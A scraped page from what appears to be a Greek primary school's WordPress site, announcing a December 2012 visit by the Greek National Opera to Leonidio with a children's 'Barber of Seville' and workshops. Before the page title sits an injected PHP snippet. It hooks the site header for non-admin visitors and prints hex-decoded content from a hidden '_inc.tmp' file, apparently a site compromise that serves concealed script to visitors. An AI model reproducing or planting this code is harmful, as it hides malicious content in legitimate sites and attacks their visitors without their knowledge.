if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Η ΕΘΝΙΚΗ ΛΥΡΙΚΗ ΣΚΗΝΗ ΣΤΟ ΔΗΜΟΤΙΚΟ ΣΧΟΛΕΙΟ ΛΕΩΝΙΔΙΟΥ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Η ΕΘΝΙΚΗ ΛΥΡΙΚΗ ΣΚΗΝΗ ΣΤΟ ΔΗΜΟΤΙΚΟ ΣΧΟΛΕΙΟ ΛΕΩΝΙΔΙΟΥ

Η Εθνική Λυρική Σκηνή στο πλαίσιο υλοποίησης έργου ??Η όπερα διαδραστικά στα δημοτικά σχολεία?? του Υπουργείου Παιδείας & Θρησκευμάτων, Πολιτισμού & Αθλητισμού, θα επισκεφτεί το Λεωνίδιο στις 3 και 4 Δεκ. 2012. Στο κλειστό γυμναστήριο Λεωνιδίου στις 4 Δεκ. θα παρουσιαστεί η όπερα ??Ο κουρέας της Σεβίλλης?? του Τ. Ροσσίνι σχεδόν σε όλα τα σχολεία της Κυνουρίας σε μια παράσταση ειδικά διασκευασμένη για παιδιά.
Για δύο μέρες ειδικοί εκπαιδευτές της ΕΛΣ θα επισκεφτούν το σχολείο μας και θα συνεργαστούν με τους μαθητές και τους δασκάλους στο στήσιμο της παράστασης (σκηνικά, κοστούμια, μουσική, κινησιολογία) και θα συζητήσουν με τους συντελεστές (σκηνοθέτη, μαέστρο μουσικούς, ηθοποιούς κ.α.) την σημασία και την φύση των επαγγελμάτων που σχετίζονται με την όπερα. Ακόμη η χορωδία του σχολείου μας θα συμμετέχει στην παράσταση τραγουδώντας το φινάλε του έργου.
Στόχος είναι οι μαθητές να έρθουν σε επαφή με την όπερα, μια τέχνη που συνδιάζει μουσική, λόγο, εικαστικές τέχνες, σε ένα σύνθετο σκηνικό έργο. Η κατανόηση της αξίας της τέχνης ανεβάζει το αισθητικό κριτήριο των παιδιών και τα βοηθάει να εμπλουτίσουν την ζωή τους.